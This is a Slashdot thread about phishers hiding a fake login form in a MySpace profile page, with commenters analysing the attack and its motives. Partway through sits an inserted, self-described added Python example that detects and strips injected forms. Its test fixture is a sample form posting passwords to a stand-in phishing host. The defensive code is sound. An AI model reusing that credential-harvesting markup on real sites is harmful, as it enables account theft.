MySpace Accounts Compromised By Phishers 86
An anonymous reader writes, "Netcraft has discovered that the social networking site MySpace appears to have been compromised by phishers who have presented a spoof login form on the main site. This modified login form submits the victim's username and password to a remote server hosted in France." From the article: "The hackers have engineered a fake login form on MySpace's own web site. Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form." This Washington Post story from a few months back explains what's in it for the phishers.
Maybe I caused the slow discovery (Score:3, Interesting)
I've been seeing 'em now and then and contacting the hosts where the scripts are hosted to get their accounts disabled.
I'm not worried about being phished myself... I'm quite perceptive...but it's people I know who I'm worried about.
Re: (Score:2, Funny)
Re: (Score:2, Funny)
Re: (Score:1, Funny)
Re: (Score:2, Informative)
They need to get that fixed ASAP (Score:1, Troll)
Re: (Score:1)
Re: (Score:1)
Finally (Score:3, Funny)
The secrets of apathetic teens will soon be aired for the world to view!
Not quite. (Score:1, Informative)
http://www.comscore.com/press/release.asp?press=1019 [comscore.com]
Re:Not quite. (Score:4, Funny)
Re: (Score:1)
Re: (Score:1)
You're thinking of Livejournal.. (Score:2)
Re: (Score:1)
1 a real like paid domain ------- got that myself
2 a real like paid hosting agreement ----- i use imagelinkusa.net myself
3 some actual html skills (or some sanish tools)
if you want to use some crawling horror like MySpace, set up some sort of Zen profile and LINK YOUR DOMAIN
(funny thing is mySpace is blocked by at least one company)
Re: (Score:2)
Just curious...
You can view the horrible phishing status for free (Score:4, Interesting)
BTW, as it is free to use, SURBL added it, so now the stuff you verify actually helps people using that free list.
Netcraft confirms (Score:2, Funny)
Re: (Score:1)
So Much for IE7's Anti-Phishing (Score:2)
Meanwhile "web 2.0" applications will suffer phishing attacks anyway because the 2.0 complexity offers so many new ways to do bad things.
Today myspace, tomorrow your web 2.0 bank? Google 2.0 application?
I'm not saying progress is bad. But there's no penalty/liability for writing insecure web 2.0 apps.
Re: (Score:1)
Re: (Score:2)
Re: (Score:2)
> view it's a nightmare. Malformed HTML, non-degradable Javascript, code
> injection issues...
In other words, Web 2.0.
It's dead... (Score:1)
Seems Myspace has fixed it. Not that I really care, as I've never used it nor do I have any intention to.
Next!?
Re: (Score:1, Insightful)
No, they've deleted this one specific account - the vulnerability that allowed the phishers to insert a form (and the styling to remove the regular page content (which is a feature)) is almost certainly still there.
Expect to see a large number of variations on this to show up in the next few days/weeks.
NOT on Myspace's MAIN PAGE (Score:5, Informative)
The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form.
Netcraft says this is still live on Myspace's main page. I've looked at the HTML source for both the main page, and that special login page you get when you try to access a portion of the site that requires you to log in. On both pages, I located the form element which controls the login. The method is POST, and the action redirects to a script under the "login.myspace.com" domain.
So the summary and the article itself are slightly misleading (at first) by implying (perhaps unintentionally) that the phishing attempt is coming directly from MySpace's main page.
Re: (Score:2, Informative)
Re: (Score:2)
I also noticed that the summary doesn't make any mention of it being a profile page. The article itself doesn't tell you it's a profile page until much further down. Seems like this would be the first thing to point out.
Based on the summary, I got the impression that you would be presented with the false login form if you went to http://www.myspace.com/ [myspace.com]
Re: (Score:1)
So while still a serious problem, it won't affect nearly as many people.
Re: (Score:2)
Security conscious people use MySpace? Who knew...
There's even a Slashdot group [myspace.com] on it, actually. And as security conscious as I am, I didn't see what was wrong with the first two example screenshots on Tom's blog about phishing [myspace.com]. I think that if I went through one of these fake login-page profiles I might have fallen for it, just because I don't expect to get phished from a page on the genuine site itself. Lots of people among my MySpace friends fell for it, and almost half of the bulletins in my bulletins lis
Re: (Score:2)
I suppose they could avoid this problem in the future by stripping FORM tags from the editable parts of users' profiles. That would keep this from happening again, but might break some really custom (not even recognisable) MySpace pages.
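Two defensive checks come up in this thread: the earlier comment verified that the genuine login form's action points at login.myspace.com, and the comment above proposes stripping FORM tags from user-editable profile markup. The following is an added example (not code from MySpace, Netcraft or any commenter) that does both over a constructed profile snippet: it lists every form whose action submits anywhere other than an assumed trusted login host, and it removes form-related elements from user-supplied markup. The trusted host set, the tag list, and the sample markup (including the `phish.example.invalid` hostname) are assumptions for illustration.

```python
"""Audit user-supplied profile HTML for injected login forms, and strip them.

Added example using only the standard library. Assumes the site's real login
form always posts to an absolute URL on a known host (login.myspace.com, as
observed in the thread) and that user-editable profile markup should never
contain form elements at all.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the only host the genuine login form is allowed to submit to.
TRUSTED_LOGIN_HOSTS = {"login.myspace.com"}

# Form-related elements that have no business in user-editable profile markup.
FORM_TAGS = {"form", "input", "button", "select", "textarea"}

# Constructed sample: a profile body carrying a credential-harvesting form.
SAMPLE_PROFILE = (
    '<div style="color:#fff">About me</div>'
    '<form method="post" action="http://phish.example.invalid/collect.php">'
    'Email: <input name="email"> Password: <input name="password" type="password">'
    '<input type="submit" value="Login"></form>'
    '<p>Music &amp; photos</p>'
)


class FormAuditor(HTMLParser):
    """Collect every <form> together with its action and method."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            a = dict(attrs)
            self.forms.append({"action": a.get("action") or "",
                               "method": (a.get("method") or "get").lower()})


def suspicious_forms(html, trusted_hosts=TRUSTED_LOGIN_HOSTS):
    """Return forms that submit to a host outside trusted_hosts.

    A relative or empty action is flagged too: the genuine login form uses an
    absolute URL, so anything else inside a profile is not it.
    """
    p = FormAuditor()
    p.feed(html)
    p.close()
    flagged = []
    for f in p.forms:
        host = urlparse(f["action"]).hostname
        if host is None or host.lower() not in trusted_hosts:
            flagged.append(f)
    return flagged


class FormStripper(HTMLParser):
    """Re-emit markup with <form> subtrees and stray form controls removed."""

    def __init__(self):
        # Keep entity/char references verbatim so text is not un-escaped.
        super().__init__(convert_charrefs=False)
        self.out = []
        self.depth = 0  # > 0 while inside a <form> element

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.depth += 1
        elif not self.depth and tag not in FORM_TAGS:
            self.out.append(self.get_starttag_text())

    def handle_startendtag(self, tag, attrs):
        if not self.depth and tag not in FORM_TAGS:
            self.out.append(self.get_starttag_text())

    def handle_endtag(self, tag):
        if tag == "form":
            self.depth = max(0, self.depth - 1)
        elif not self.depth and tag not in FORM_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.depth:
            self.out.append(data)

    def handle_entityref(self, name):
        if not self.depth:
            self.out.append(f"&{name};")

    def handle_charref(self, name):
        if not self.depth:
            self.out.append(f"&#{name};")

    def handle_comment(self, data):
        pass  # HTML comments are dropped from profile markup


def strip_forms(html):
    """Return html with every form element (and its contents) removed."""
    p = FormStripper()
    p.feed(html)
    p.close()
    return "".join(p.out)


if __name__ == "__main__":
    for f in suspicious_forms(SAMPLE_PROFILE):
        print("suspicious form:", f["method"].upper(), "->", f["action"])
    print("sanitized:", strip_forms(SAMPLE_PROFILE))
```

The stripper is the minimal denylist the comment proposes; it does not address the other half of the attack described in the thread, the styling that hides the genuine page content, and an allowlist sanitizer (permitting only known-safe tags and attributes) is the stronger design for user-editable markup.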
Number of compromised accounts (Score:2)
1) the total number of "phished" accounts
2) the number of "phished" accounts in terms of a percentage of the total userbase.
Re: (Score:1)
Re: (Score:2)
Re: (Score:1)
Re: (Score:2)
Re: (Score:1)
MySpace Age Ranges By Gender As Indicated By Users

Age Range   % Male   % Female   % Total
12 to 15    0.0007   0.0012     0.0019
16 to 18    9.25     12.39      21.64
19 to 21    11.64    12.29      23.93
22 to 35    22.90    18.00      40.90
36 to 55
Re: (Score:1)
someone should tell the phishers (Score:1)
Re: (Score:2)
The 16-year-old kid who logs onto MySpace at 02:41 is using the same computer in the basement that mom and dad use the next morning at 07:45 to log into their bank accounts, pay bills, trade some stock, and so on.
That's why even a free MySpace is a good target. As a matter of fact, MySpace is an excellent target because it has highly loyal and extremely active users who log into MySpace multiple times a day. This means that if the phishers' crack stays
Re: (Score:2)
Yes, the phishers could create MySpace accounts/pages from scratch, but their work pays off much more quickly if they co-opt the pages of frequent users with large, we
Re: (Score:2)
Huh ? Right ?
Guys ?
Re: (Score:1)
Re: (Score:2)
People login to myspace with an email address and password.
If a person used the same password for their email, then not only is their email compromised, but via their email, the attacker gets a list of other potential sites to try.
I would be extra suspicious of strange behaviour by ebay users for example. What is especially insidious about this is that once you've got someone's email account, you can run
Re: (Score:2)
MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?
There's actually a great interest in it. Because when you're an average user, unaware of that whole phishing thing, and a bulletin from one of your favourite singers or friends says "~New Ring tones Adults can't hear! Download Today*", linking to a website to supposedly download them, you're much more likely to click, thinking it was recommended to you by someone real (a "friend" or an artist you like), than when you
Re: (Score:2)
This one got me... (Score:1)
Re: (Score:1)
True story... and I posted it on a forum where you don't want to click any links.
(Captcha: mourning... I am, indeed, for today's security.)
Using the same username/password everywhere (Score:1)
Phishing + SSL (Score:1)
How do sites like these get SSL from Verisign? How could that slip through? There was a recent
Re: (Score:3, Insightful)
When you can buy SSL certificates so damn cheap, $15 or less at some places, no serious company is going to certify you as being hardened against XSS or traditional hacks like this and compensate you or your users when you DO get hacked.
Besides, Verisig
Re: (Score:3, Interesting)
Registrant:
Washington Mutual, Inc. (DOM-1398425)
1201 3rd Ave Seattle WA 98101 US
Domain Name: wamucards.com
Registrar Name: Markmonitor.com
Registrar Whois: whois.markmonitor.com
Registrar Homepage: http://www.markmonitor.com/ [markmonitor.com]
Administrative Contact:
First off... (Score:1)
This wouldn't have happened (Score:1, Redundant)
nothing new... (Score:1)
My girlfriend's account was compromised like this about a month ago. She tried telling me the Mac has a virus (really). I made her change her password and now I periodically do a "Reset Safari" on 'her' browser.
I haven't noticed any strange posts by her or anything since the initial attack, so it seems it's a one-time-only type deal. Of course, an attack like this could be potentially worse; hell, I wish it was worse. I wish it would have ruined her account and wouldn't let her create a new one.
The des
Re: (Score:1)
Taken Down? (Score:2)
Either that, or, that's what these scammers want us to think?
the YTMND irc channel is full of myspace phishers (Score:1)
How is MySpace leaving the hack up legal? (Score:1)
How long was it active? (Score:2)
When we first came across this information a few days ago, it was also linked to Mashable.com [mashable.com], which claims that up to 3,000 logins may have been compromised, and that they only recently became more successful in running the attack (having initially screwed up the inserted script). The other aspect is that Mashable appears to be talking about a slightly different phishing attack, which is still functional (using MySpace bulletins to spam other users).
Filtering based on blacklists (as you are suggesting M
But Why (Score:2)
1. It is a good way to get information about the user
2. Good way to get information about the user's friends.
3. How many PC illiterates often use the same password for multiple accounts?
I have already added the following line to my hosts files:
216.178.32.51 greentea420.iespanna.es
So ... why is this a bad thing? (Score:2, Funny)
War is fun when you hate both sides.
Re: (Score:2)
idiots fall for otherwise transparent con (Score:1)
I'm not surprised (Score:1)
Also the MySpace site in general is kinda clunky.. Looks like some high school kid's project that's still learning HTML. In other words, it looks like crap. I